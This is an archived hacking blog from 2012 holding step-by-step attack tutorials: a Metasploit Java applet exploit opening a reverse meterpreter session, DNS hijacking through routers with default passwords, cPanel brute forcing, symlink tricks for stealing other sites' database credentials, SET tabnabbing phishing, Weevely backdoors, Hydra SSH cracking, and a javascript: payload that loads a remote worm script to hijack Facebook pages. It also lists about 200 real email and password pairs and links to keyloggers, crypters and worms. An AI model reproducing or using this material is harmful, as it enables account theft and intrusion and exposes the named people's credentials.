SEARCH

x

Thursday 30 August 2012

How To Accept or Confirm Numerous Facebook Friend Requests at a single click


accept all facebook friends at once
Step1. First and foremost, you need to launch your Mozilla Firefox 4 or higher version & Chrome Browser. I personal use Mozilla Firefox 4.0 Beta 7 to do it. Lower version may not -work.

Step2. You need to go to your Facebook pending request page. Click here to visit the pending request page.

Step3. Then scroll down to the bottom of the page to load all friend request.

Step4. Open your browser console by using the combination of Ctrl + Shift + K (Mozilla Firefox) and Ctrl + Shift + J (Google Chrome).

Step5. Copy and paste the code below into the browser console and press enterelms=document.getElementById('contentArea').getElementsByTagName('input');for(var fid in elms){if(typeof elms[fid] === 'object'){elms[fid].click();}}

Step6. Now wait and watch the entire request on your page accepted. That’s all.

Hacking Remote Pc by Exploiting Java Applet Field



This is a vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/ PUTFIELD/ GETSTATIC/ PUTSTATIC instructions leads to insufficient type checking. A specially-craft ed class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations.
Requirement:-
*. Attacker Machine: Backtrack
*. Victim Machine: Windows (install JRE un-patched version)
Step1: Launch the Metasploit console
Open the Terminal in the AttackerMachine (Backtrack).
Type " msfupdate " , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.
Step 2:
Type " use exploit/multi/ browser/ java_verifier_fi eld_access " and follow the below commands:-
msf exploit(java_ve rifier_field_ac cess)> set PAYLOAD java/ meterpreter/ reverse_http
msf exploit(java_ve rifier_field_ac cess)> set LHOST [Backtrack IP ADDRESS]
msf exploit(java_ve rifier_field_ac cess)> exploit
Step 3:
If you follow the above commands correctly, you will get the result as in image.
Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and createsa new session.
Now type " sessions ", this will show the list of active sessions .
Type " sessions -i 1 ", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/ control the Target.

DNS Hacking/Hijacking Tutorial




This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.

To start, you’ll need• A computer running Linux (Ubuntu in my case)• A basic understanding of how the Domain Name System (DNS) works.Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.
 

Why DNS?


The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.


Malicious DNS Server


So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.


Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)


sudo gedit /etc/dnsmasq.conf


The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof


The format for this is address=/HOST/IP


So for example;


address=/facebook.com/63.63.63.63


where 63.63.63.63 is the IP of your malicious web server


Save the file and restart dnsmasq by running


sudo /etc/init.d/dnsmasq restart


You now have a DNS server running which will redirect requests for facebook.com to 63.63.63.63


Malicious Web Server


You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.


There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site


I’ll presume you know how to do that though


Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.


I Can Be Your DNS Server Plz?


An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that


But how do you get a victim? Well this is where my project, the IP Experiment could come in handy


If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.

Sunday 26 August 2012

Cpanel Cracking



Things Required :-

Shelled site
Cpanel Password Cracker (shell)


First open you shell & upload the cpanel password cracker shell . Download the Cpanel password cracker shell from Here .
Then go down & click on User .


Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .

Tip: Password list should be short & effective .

After the cracking is finished, in the next page you will see the result .

After Getting the login info you can login by going  www.site.com:2082 . Here you will get the cpanel login area .


How to Hack websites using Symlink



Requirements:-

Shelled Website
Some php files which will help you to gain symlink.
To download them click here


Firstly I want you to clear that it mostly works on Wordpress And Joomla sites only.

First open your shelled site and then make a new directory, of whatever name you want. Ex:- xyz .
Then in that directory upload the files which I have given you in upper section.
After that Click on -rw-r--r-- of config.pl .

Then from there change the value from 0644 to 0755 .


Then open the config.pl . In my case, to open config.pl, I'll go to http://www.example.com/xyz/config.pl .


Then leave this tab open. And then open nsuser.php. In my case the nsuser.php will be at http://www.example.com/xyz/nsuser.php.
Then in that click on Eval.

Then click on Go button.


After copying paste it to the config.pl box which you have opened early. And then click on Dapatkan Config!

Then go back to directory where you have upload all the files. In my case, it was http://www.example.com/xyz/ 
In that directory you will get all the config files of the sites hosted on the server.
[Brief Note On Config Files :- Config Files are those which contains the database name and username, password also.]
Now you have done successfully.
You have now database name, username of database and also the password.
Now may be you have a question how to connect with database or where to put these credentials.

So lets begin:-

Now the file ida.php from where you have uploaded. In my case the ida.php file is in http://www.example.com/xyz/ida.php .

After that click on sql.
Then in Login - Type username
     Password - Type password
     Database - Type database name

Then click on double arrow ">>" button.
Now you are connected to database.
After that make a check mark in wp_user and then click on dump.

[Note:- There may be chances that the wp_user can renamed to another name, for example db_user etc.]

After that the dump.sql will saved at, where you have uploaded the previous files. In may case, the file dump.sql saved athttp://www.example.com/xyz/dump.sql .
So now lets open the dump.sql .
Boom !! now we have got the admin username, password and email.
Now use these credentials to login the admin panel.
But now you have the question where I put these credentials and how to know these credentials are of which site.
So now lets begin.


Copy the name of the db_user [which was found in the config file in .txt format]
Now in my case the  db_user is localbus_main.
Now again open the ida.php,and then go to under Symlink section, by clicking on the  Symlink.

After that click on Whole Server Symlink. Then there you a huge list of sites which are are hosted on the server.
Now then to find the site of which you got the credentials. Simply press ctrl+F then type your db_user name.
In my case the db_user is localbus,so i'll try to search localbus.

Now your targeted site is infront of the username. Now login to your targeted site and do what ever you want.




Friday 17 August 2012

"Portail Dokeos" deface and Shell Upload vulnerability


Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password.


Google Dork
"Portail Dokeos 1.8.5"
Exploit http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Just add "/main/inc/lib/fckeditor/editor/filemanager/upload/test.html" after www.website.com.
You can upload, .html .php .jpg .txt formats here. To view your uploaded file go here : http://website/patch/main/upload/your file here 

Tuesday 14 August 2012

200 Facebook Accounts Hacked By DigiLocker64


TIM4965@COMCAST.NET:8423DNEE
jessica_ita_gomes@hotmail.com:jessicagomes
puppyylr@aol.com:quasar243
books4vj@gmail.com:vaj001
rafaeldo147@hotmail.com:rafa1313
winrobg@gmail.com:robbyboy
alan_morais_braga@hotmail.com:alan1234
ngocdung205@hotmail.com:thesun
iwryvsc:guimaraesvsc
sammer_mohanty@rediffmail.com:ranjan12
gurukanagaraj:gkminale
jeromeshalin:shalin2206
pavanreddy111:Avukupavanreddy
sexypaul89@gmail.com:9996146130
alpes23:9837555721
mbsajan@gmail.com:asifbinoy
praveenjha100:9836757729
suzicat@ig.com.br:02021981
sujeeshsmenon:kuttan
bn2online@gmail.com:thakursaab
mariamarcile@hotmail.com:92427406
digao_sjd@hotmail.com:Digo1404
rafael.patricio.cunha@hotmail.com:rafaelpc2000
styrox@juno.com:handstop
LGB1920@yahoo.com:Columbus
miguelturri@gmail.com:adamas77
matheus.manchester@yahoo.com.br:1705950090
jbussemey@aol.com:patrick
erica_parque@msn.com:catia123
secretobcession@yahoo.com:lola196
luccamo@hotmail.com:Amigosol
luam_11@hotmail.com:cpktnwt759240
jolvba@hotmail.com:tidahumana
mare.la@hotmail.com:marela60
emil_vojkollari@hotmail.com:meimiri
MMATHIAS18@HOTMAIL.COM:93452540
biancagalliera:899659
sasa.amore_cat@hotmail.com:18596423
flaviagabrieli:euqueroquesefodaessaporradesociedade
gra_gatcha@bol.com.br:gra96082054
yuriolivs:633444
AlissinhoIce:tamgamandapioeusei
vitordominot@hotmail.com:vivikeystone1996
tamaralemes2009@hotmail.com:leanderson123
rafaelaperrut@hotmail.com:25230524
sunssuns@live.com:12sunsmaii
natuffa:natacha16
cleilson_koka@hotmail.com:50582101
marcoslenny:1990amssa
douglasdasdgs@gmail.com:9137doug
leonardo.henrique91@gmail.com:2506leonardo
popolly-morena@hotmail.com:boltflayy
pampam_bm@hotmail.com:78366937
arcanjos.fred@hotmail.com:fred230682*
thailon_zarlon_ap@hotmail.com:99122531thailon
pedrohzb@hotmail.com:phzb050897
larissameloitri@hotmail.com:larissa31296
gfdoppler@hotmail.com:matufran
gean_ceara@hotmail.com:jeanmichel
samlovesham03@live.com:samlovesham
arthur_ervilha@hotmail.com:2486513790
patyfrank@terra.com.br:rodrigo
milena_severo@hotmail.com:19demaio
matheusmertzribeiro@hotmail.com:06011998
pablo.henrique45@gmail.com:91425824
izzamarttins:cleilson
arthur_wagmacker@hotmail.com:11031996
vitinho_2801_zn@hotmail.com:vitormachado
santytabel01@hotmail.com:021590033
nandez55@hotmail.com:davidd
jean.lui98@hotmail.com:38049612
xandysoro:luanna9696
vini--pqp--vini@hotmail.com:canada17052020
marcelomagalhaes18@hotmail.com:big14793
Rodrigo_Ferreira_Rodrigues@hotmail.com:vascodagama
joelpetrucci@hotmail.com:4815162342
labandachaka@hotmail.com:chakal69
gabriele_bjs@hotmail.com:esqueciasenha
aloipires@hotmail.com:24021993
reniltondk@hotmail.com:erika200
alancesarsk@hotmail.com:aezakmihesoyam
Markminador:garanhao01
creio_x24_@hotmail.com:cd210393
brunobasalia@hotmail.com:brunoeleuterio
nicolasbrabo@hotmail.com:abrahaonicolas
graziloirinha9@hotmail.com:020996
AHMED2003A2003@YAHOO.COM:19001900
Ellgee40@hotmail.com:3141pi
Johntmlee@yahoo.com.au:LINKS386
JAlisaburr@yahoo.com:lisa77
a0005913@yahoo.com:77sunset
abukasem2005@hotmail.com:197700
alexander.kaloudis@web.de:pupser
alhm00m@hotmail.com:alfalahi
agungagung69@yahoo.co.id:123456
alien1357@hotmail.com:12alien
alexis35ph@yahoo.com:ale5321
ba7ibakkk@hotmail.com:zaqwsx
bayroadstud@yahoo.com:11821182
checkhangdep@gmail.com:123456
divx28@wp.pl:Agnieszka11
devosborn@hotmail.com:dev2301
dwhittingham@cabletv.on.ca:buddies
eastern.violin@gmail.com:d6310458
edwincheng1@hotmail.com:2803193
holzweg5@hotmail.com:dalida24
jay.allender@yahoo.com:ducklips
javaidiqbal_rao@yahoo.com:123456
joe_05_dork@hotmail.com:dork05
johnf@silvatecdesign.com:TRINIDAD
jokersreturned@yahoo.com:Blues21
lilygren@comcast.net:wpds4ufw
mcmaus51@msn.com:pantera
masswebjunkie@yahoo.com:Massive1
moses_gilstrap@hotmail.com:camp.007
oadrian@telus.net:fordcars
onstabe1@yahoo.com:ONSTABE
paulbranham@live.com:paulie69
TenZo520@yahoo.com:kornkorn
pissnelke05@gmx.de:Uromania
qimse61@hotmail.com:198519851985
qanithi@yahoo.com:sammael
qsqt25@yahoo.com:12345678
qimmea@yahoo.com:123456ab
qinlang8848@163.com:159357
quakersud@hotmail.com:winkler_34
quangminh6666@yahoo.com:123456
ondt@online.no:Soothing
quasx@hotmail.com:121968
queensryche02@gmail.com:17745156
quelodigas@hotmail.com:22052205
quinnmcmurtry@inbox.com:1234stophere
lkova1109@rogers.com:kovalaci
qusmo@hotmail.com:123123
sandis3@hotmail.com:mum36sie
rwc120@cox.net:1204225
sirrodney314@gmail.com:arajens
steveo22@fsmail.net:KEZMAN
steve@bellsbikeshop.com:bikes1
shiby@zoznam.sk:123456
wfoy@nycap.rr.com:sisb039
mdelanghe@ciaccess.com:gibson
sfsueq@yahoo.com:camaroon
eldacajim@sympatico.ca:icyur2b
phufferd@cfu.net:voyager
rodrigomiguel17@hotmail.com:leugim93
TexasBrat30@gmail.com:1texas
acheron_p@live.com:anonymous7
alaynaraquelle@gmail.com:rem1890
devinhomalokeiro@hotmail.com:19910617
aphillipswctt@yahoo.com:ap1254
annette_athome@yahoo.com:sequel9
ault1@aol.com:haley1997
auntdbear@aol.com:tobyboy
aynjill14@aol.com:1788bsp
barbmccrea@hotmail.com:forest
bemoon7469@hotmail.com:fingers
bergjudy3@aol.com:kitten
bobsbeachbks@hotmail.com:foggy1
bodaja4@aol.com:rngr37
blueapplebasket@gmail.com:apples50
bookwytch@aol.com:skeeter3
burcuacar1624@hotmail.com:gebaude
bussemey@gmail.com:patrick
bvin1999@aol.com:hayley
calsbueno@hotmail.com:apandapis
charlaedwards@hotmail.com:loveme
ckelsay@hotmail.com:whitewitch
classy1064@aol.com:tricia
cricketsjiminy@yahoo.com:mickey28
cs21873@hotmail.com:montezuma5
cyborg1945@gmail.com:sirius
d_dineen@hotmail.com:april1
cshrtstf@aol.com:2dogs2
ddbarb@aol.com:richmond
deanneraytown@gmail.com:deegrams02
debhenricks@gmail.com:calico
deb9464@hotmail.com:gwen1989
deetucker061172@hotmail.com:nathaniel
debraalbin@hotmail.com:flower2
divaqueenie@yahoo.com:092990
dls0122@aol.com:tigger2
dj_edge_blaid@hotmail.com:12345678
dutchgirl337@yahoo.com:ayikoru
elenasalvatore123@gmail.com:elenacullen
ericvanh@hotmail.com:prancer37
erinwagner@aol.com:scott78q
ewjb33@yahoo.com:bungeb
elyaklang@hotmail.com:ybotkl
fatcak_16@hotmail.com:Delpiero10

Tabnapping through backtrack - Hack any account

 In this what we need is 
1. Backtrack 5 R2 
2. Internet connection 
3. A brain 
We are going to use backtrack and social engineering kit which is inbuild in it.
So lets start,
First open the social engineering kit using this command in cd /pentest/exploits/set and then press enter and then type ./set and hit enter.
Now type 1 to select Social-Engineering Attacks and hit enter.
Now type 2 to select Website Attack Vectors and hit enter.
Now type 4 to select Tabnabbing Attack Method and hit enter.
Now type 2 to select Site Cloner and hit enter.
Enter the URL of the site you want to clone. For example gmail, so i will enter this http://www.gmail.com and hit enter. SET will clone up the web site. And press return to continue. It will start cloning the website.
Now send ur ip address as a link to victim.
Now when victim click on it they get the fake page and when he fill the details he will got hacked.

Sunday 12 August 2012

Email account/PC hacking tutorial in short by DigiLocker64


Hello everyone,
This tutorial is written by a small known learner(hacker) DigiLocker32 (me).
Let me tell you guys that i m a 16 year old guy so, if you find any mistake plz report to me asap.
Lets start,Today hacking an email account/PC is like an art, sometimes/some hacks are very easy but not so strong and some needs brains, social engineering and are very strong.
Lets go to the easier one to the toughest.

Before starting let me tell you that there is no such software made ever that can hack an email account directly and if you find such thing anywhere then that is totally fake or maybe a kit/software to hack into your PC.

Lets Start!

Keylogger : Its nothing but just a small software installed in your pc i would recommend "Ardamax Keylogger" which can record keystrokes and screenshots and can be seen by you at anytime.

a) Software Based Keylogger : Here the software is programmed in such a way that it records all the keystrokes, screenshot, passwords etc. There are two types of key-logger

b) Normal Keylogger : This is the ordinary keylogger.it also records keystrokes, screenshots but it has a limitation that you can’t install it without having physical access to victim’s pc.

c) Remote Keylogger : These are local software keyloggers with an added feature that allows access to the locally recorded data from a remote location. Remote communication may be achieved using one of these methods:Data is uploaded to a website, database or an FTP server.Data is periodically emailed to a pre-defined email addressThe software enables a remote login to the local machine from the Internet or the local network, for data logs stored on the target machine to be accessed.

d) Hardware-based key-loggers : Hardware-based keyloggers do not depend upon any software being installed as they exist at a hardware level in a computer system.For this, the hacker has to connect a hardware device on your PC. This type of keylogging usually seen at Net Cafe. It looks like a Pen-Drive, so be careful.

* Remote Server : Here we just have to create a server file which will be connected to our gmail account. You just have to send the file to victim and make sure that he install it. Now whenever he types anything youwill recieve it as an email.

* RAT (Remote Administration Tool) : First of all let me tell you RAT functions same like remote keylogger but here the difference is we will be able to control his PC just like the software known as "Team Viewer". I would recommend you to download the software"PRO RAT" for this. Prorat a famous trojan for hacking system, facebook, gmail, yahoo, twitter and other accounts. You can download it easily by searching on google.

* Social Engineering : If you use very weak passwords your family member or friends can guess your password easily. While you are login in, they might have seen some of the keys you are pressing while typing password & then they can make a guess of whole password. The hacker may ask you for your password by any manner.

* Phishing : Here we have to use our brain and some social engineering its nothing but forcing the victim to do what you want/need. Here what we do is create an fake login page of the website e.g. Facebook. We just have to make a fake login page which looks like facebook login page and force the victim to enter their email and password there, and as he enters you will recieve his id andpassword eg- Instead of “www.facebook.com/login.php” it will look like “www.abc.com/a/b/c/login.php”. Hacker may send his own URL by shortening it & it’ll look like “www.goo.gl/an67h “ . but after you open this, it’ll expand and you can see it’s real URL. For tutorial on phishing visit my blog and search phishing here www.digilocker32.blogspot.in

* Network Sniffing : A hacker can sniff the network using special tools such as "CAIN & ABEL" can decrypt your email password. This requires a very special hacking knowledge.

* Metaspoilt : The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc. For this you just need to have victims IP address now the things you need is First you need to download Metasploit. PostgrSQL for your database. You can get everything about metasploit at my blog search "metasploit" here www.digilocker32.blogspot.in

* Tabnapping through backtrack (my favourite one) : In this what we need is 
1. Backtrack 5 R2 
2. Internet connection 
3. A brain 
We are going to use backtrack and social engineering kit which is inbuild in it.
So lets start,
First open the social engineering kit using this command in cd /pentest/exploits/set and then press enter and then type ./set and hit enter.
Now type 1 to select Social-Engineering Attacks and hit enter.
Now type 2 to select Website Attack Vectors and hit enter.
Now type 4 to select Tabnabbing Attack Method and hit enter.
Now type 2 to select Site Cloner and hit enter.
Enter the URL of the site you want to clone. For example gmail, so i will enter this http://www.gmail.com and hit enter. SET will clone up the web site. And press return to continue. It will start cloning the website.
Now send ur ip address as a link to victim.
Now when victim click on it they get the fake page and when he fill the details he will got hacked.

NOTE : All the sources in the tutorial can be easily found on google.
Here we are done with this tutorial if you need to know anything more about this tutorial and any questions if you have then inbox me.

This tutorial was just for educational purpose, I would recommend you not to try this anywhere, may lead to heavy penalty.

Thank You,
DigiLocker64



Tuesday 7 August 2012

How to make a backdoor using Weevely - Backtrack 5 R2

 


So now lets begin:-
I'm not goin to tell you about the commands of Linux
Requirements:-

    Backtrack
    Shelled Server
    Basic knowledge of Linux commands

    Now open terminal, goto the directory cd /pentest/backdoors/web/weevely.
Now in the same directory type, ./weevely.py and then hit enter.[It will show you the usage of weevely]
Now type ./weevely.py generate <password> <location, where u want to save file

[Note:-

    generate is used to make a file, which will be used by weevely, as a door between you and the server.]

    Then upload that file in your shelled server, which you have make just in above step.
    After uploading it, copy the url of your uploaded file. Then type ./weevely.py <url> <password>

Now you are connected with the server



Tutorial on Windows Hijacking

 
Learn windows hijacking through backtrack.

Tutorial written by Gurender Singh {I.C.P}

Download links:  [#] ~ PDF

Download link -> http://www.mediafire.com/?ri9jshe69bvtnc3


[#] ~ PDF + VIDEO TUTORIAL

Download link -> http://www.mediafire.com/?t4965617qlu8q3i

The Union Minister for Corporate Affairs and Power


Dr. M. Veerappa Moily chaired a meeting with the Chief Ministers and Power Ministers of North Indian States to discuss the power situation, in New Delhi on August 06, 2012. The Chief Minister of Delhi, Smt. Sheila Dikshit, the Chief Minister, Rajasthan, Shri Ashok Gehlot, the Chief Minister of Uttarakhand, Shri Vijay Bahuguna and the Minister of State for Power, Shri K.C. Venugopal are also seen.

- Dr. Manmohan Singh 

Sunday 5 August 2012

Websites On Shared Hosts – Symlink Bypass



What Is Symlink Bypass?
Well, I would not like to go into much detail. However for your understanding all you need to know is that symlink is a method to refrence other files and folders on linux. Just like a shortcut in windows. Symlink is necessary in order to make linux work faster. However symlink bypassing is a method which is used to access folders on a server which the user isn’t permitted. For example the home directory can only be accessed by a root level user. However with symlink bypass you can touch files inside home directory.
Directory Access With Symlink Bypass

Step 1
Perform the same steps which we did before. Create a directory, e.g abc. Now uploadjaguar.izri & .htacess in it. Give 0755 permission to jaguar.izri


Steps 2

Suppose that we uploaded it in root of dir. So our path should be www.site.com/abc. Next open it and load the jaugar.izri, which will be located on www.site.com/abc/jaugar.izri


Step 3

Open it and make a new dir named 123 by issuing the command mkdir 123.


Step 4

Now lets enter dir 123 by giving command cd 123.


Step 5

Now give the following command ln –s / root


Step 6

Once you have issued the command ln -s /root, you should see folder named root in dir 123. In order to check go to www.site.com/abc/123/ and you will see a folder named root.



Step 7

Next go back to script and press upload file:

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php

Copy the above in a notepad and rename it as .htacess and upload it to 123 folder.


Step 8

Next open root dir. www.site.com/abc/123/root

Note: if you don’t upload that .htacess you wont see this home folder


Step 9

Now click on that home folder and upload the domain.php file to get usernames. Or use the command cat /etc/passwd, to get the usernames.


Step 10

Now go to bing.com enter ip  x.xx.xx.xx/joomla to get joomla sites on server search for names in users column of that sites once found. Place that name after home and add public_html like www.site.com/abc/123/root/home/victimusername/public_html


Step 11

When you do that you will get access to dir of that website.

Step 12

Now click on configuration.php it will show you blank page> Don’t worry just right click their and view page sources you’ll have database access.

Even if the admin has changed the admin login page or the configuration file, You can still find it by using this method.










Saturday 4 August 2012

MAC SPOOFING | MAC ADDRESS CHANGING IN BACKTRACK



As we all know How important MAC address Is.Mac address is used for tracing the Hacker/Attacker.
Here is a nice tutorial that allow you to change ur MAC Address(Hardware Address OFf A specific Computer).
Tutorial to change MAC Address In Backtrack

1] Open the terminal type ifconfig.(check your MAC Address)

2] In terminal, type ifconfig eth0 down this command is used for disabling the eth0 interface.

3] Now change the MAC address by using a simple command in backtrack macchanger –r eth0

4] Now type ifconfig eth0 up this command is used for enabling the eth0 interface

5] Again check your fake MAC Address By typing ifconfig.

SERVER HACKING FROM REMOTE PC USING HYDRA VIA SSH DICTIONARY ATTACK IN BACKTRACK



This attack is commonly used against remote Linux servers on which SSH service is enabled.

Hydra is a password cracking tool available in Backtrack.
Let the IP address of the server be 192.168.109.134.
So start an nmap scan. For that open terminal and issue the following command:

nmap –p 22 192.168.109.134

After the scan is completed, it will show you whether SSH service is enabled at port 22. You can only proceed if the nmap scan shows the result similar to that in the above image.
Now open hydra GUI which is located at BackTrack -> Privilege Escalation -> Password Attacks -> Online Attacks -> hydra-gtk

On the target tab specify the details as follows:

Single Target: 192.168.109.134

Port: 22

Protocol: ssh

Show Attempts: checked

Be Verbose: checked

On the Password tab specify the details as follows:

Username: root //we are assuming that the username is root.

Password List: Select a password list.

On the Tuning tab specify the details as follows:

Number of Tasks: 10

Timeout: 29

Now click on the Start tab and select Start and wait for Hydra to crack the password. The password will be cracked if its there in the password list.

Now after you got the password go to terminal and issue the following command:

ssh 192.168.109.134

root@192.168.109.134’s password:

it will ask for the password give the password and you are in the remote system.


Securing/Protection Against Attack

* Configure SSH in Filtered state.
* Setup a strong password.
* Change the Default Password and User Name.
* Configure the iptables rule to defend against Dictionary attack.
* Make Updates Regularly .

BACKTRACK BASIC COMMANDS LEARNING FOR BEGINNERS



How to Log in

Once the installation of BackTrack is done, the default username and password required to log in Those are root(username) / toor (password)
How to Open GUI Environment BackTrack

After you are logged in you can start the GUI Environment by issuing the startx command
How to check IP address


root@bt:~# ifconfig

How to Setup IP Address Manually


root@bt:~# ifconfig eth0 192.168.1.8

root@bt:~# route add default gw 192.168.1.1

root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

How to Change the Root Password


root@bt:~# passwd Enter new UNIX password: {enter your new password here}

Retype new UNIX password: {enter your new password again}

How to start services


root@bt:~# /etc/init.d/openvpn start

Starting Virtual private network daemon(s)…

root@bt:~# /etc/init.d/openvpn stop

passwd: password updated successfully

How to check kernel version


Use the uname -a Shows Kernel Version
Common Apt Commands


apt-get install Downloads and all of its dependencies, and installs or upgrades them.

apt-get remove [--purge] Removes and any packages that depend on it. –purge specifies that packages should be purged.

apt-get update Updates packages listings from the repo, should be run at least once a week.

apt-get upgrade Upgrades all currently installed packages with those updates available from the repo. should be run once a week.

apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.

apt-cache search Searches packages and descriptions for .

apt-cache show Shows the full description of .

apt-cache showpkg Shows a lot more detail about , and its relationships to other packages.

man apt Will give you more info on these commands as well as many that are in less common usage.
Common dpkg commands


dpkg -i Installs a package file; one that you downloaded manually, for example.

dpkg -c Lists the contents of a .deb file.

dpkg -I Extracts package information from a .deb file.

dpkg -r Removes an installed package named

dpkg -P Purges an installed package named . The difference between remove and purge is that while remove only deletes data and executables, purge also deletes all configuration files in addition.

dpkg -L Gives a listing of all the files installed by . See also dpkg -c for checking the contents of a .deb file.

dpkg -s Shows information on the installed package . See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.

dpkg-reconfigure Reconfigures an installed package

man dpkg Will give you more info on these commands as well as many that are in less common usage.

HCONSTF SECURITY TESTING FRAME WORK (HCONSTF)


This is an wonderful tool to use if your are a security / Penetration testing person.
HconSTF is an Open Source Penetration Testing Framework based on different browser technologies developed by Ashish Mistry an Information Security Researcher.
It helps in much more information on gaining and digging information on security Penetration testing or vulnerability scanning assessment.
Some list of (webbased)tools that it contains are XSS attacking, SQL Injection, siXSS, CSRF, Trace XSS, RFI, LFI, Etc. It could prove useful to anybody interested in the information security domain – students, security professionals, web developers and so on.

Its Code name is also known as "Freedom" Dedicated to all freedom fighters released on 26th of January (Republic Day).

Silent Feature of HconSTF

Categorized and comprehensive toolset.

Contains hundreds of tools and features and script for different tasks like SQLi,XSS,Dorks,OSINT to name a few.

HconSTF webUI with online tools (same as the Aqua base version of HconSTF).

Each and every option is configured for penetration testing and Vulnerability assessments.

Specially configured and enhanced for gaining easy & solid anonymity.

Works for web app testing assessments specially for owasp top 10.

Easy to use & collaborative Operating System like interface.

Light on Hardware Resources.

Portable - no need to install, can work from any USB storage device.

Multi-Language support (feature in heavy development translators needed).

Works side-by-side with your normal web browser without any conflict issues.

Works on both architectures x86 & x64 on windows XP, Vista, 7 (works with ubuntu linux using wine)/
Netbook compatible - User interface is designed for using framework on small screen sizes.

Free & Open source and always will be.

Tools Included

Information gathering / Analysis

Editors / Debuggers

Exploitation / Auditing

Anonymity

Passwords

Cryptography

Database

Scripting / Automation

Network Utilities

Reporting. Etc

DOWNLOAD

Facebook fan page hacking



Steps That You Need To Follow

1)At first Download the exploit from here

2)After downloading the exploit, you need to edit it wit any editor software i suggest notepad++, one of the best editor. You can download it from here

4)Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the textHey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an auto-posting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)

5)Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:
---------------------------------------------------------------------------------------------
www.yoursite.0fess.net/booster.js
---------------------------------------------------------------------------------------------

6)Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in hisbrowser’s address bar and hit enter while he is on Facebook.
---------------------------------------------------------------------------------------------
javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)
---------------------------------------------------------------------------------------------

Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.

Now its done you have successfully hacked the admin of the fan page.
These days many Facebook fan page is getting hacked with this trick.so for all admin be secure you self from these attack this is explained for educational purpose only.

Friday 3 August 2012

MY BEST COLLECTION OF Professional Hacking Tools - 82 TOOLS


1 - rDOS

http://www.ziddu.com/download/14061252/rDos.zip.html

2 - Windows Admin Password Reset (Small Linux disk) -- Its a small linux image which can resets the admin password.

http://uploading.com/files/14747c2e/Wind...nload.rar/

3 - RAPIDSHARE ACCOUNT CHECKER(New Mask Added) -- Title says it all.

http://uploading.com/files/51cd3m24/RS%2...ECKER.rar/

4 - SQL FUZZER WITH VIDEO TUTORIAL(Only 1.5mb) -- Powerfull tool for sql injection.

http://uploading.com/files/253aaa2a/SQL%...ORIAL.rar/

5 - Ca0s SQL Perl Inj3ct0r v1 -- Good SQL injection tools source code.

http://uploading.com/files/9me23443/Ca0s...%2Bv1.rar/

6 - Milw0rm_Search_Utility_v1.0 by skyweb07 -- Small utility which can search exploits for you.

http://uploading.com/files/bfaem73d/Milw...web07.zip/

7 - Vaqxine Keylogger -- A very good tool by reputed member,it might not be FUD now but its a good tool.

http://uploading.com/files/69df2e18/Vaqx...ublic.rar/

8 - Hackers Tool Box -- Many handy tools.

http://uploading.com/files/3fm492c2/Hack...%2Bv1.rar/

9 - Nathans Image Worm -- It replaces every image on victim's pc with your defined image

ttp://uploading.com/files/3fe18118/Nath...BWorm.rar/

10 - HTTP Recon 7.3 -- Use it know weather an exe is backdoored or not.Basically its for Fingerprinting and vulnerability analysis.

http://uploading.com/files/fmd19969/httprecon-7.3.zip/

11 - JKymmel's Crypter -- For crypting you viruses.

http://uploading.com/files/e4m6514m/...2Bv%2B1.2.rar/

12 - Icon changer -- Change the icon of any file

http://uploading.com/files/6ad6aff5/IconChanger.rar/

ANONIMITY TOOLS

13 - Proximitron -- It proxifies every program you use even the command prompt.

http://uploading.com/files/ma6bm24e/proxo.rar/

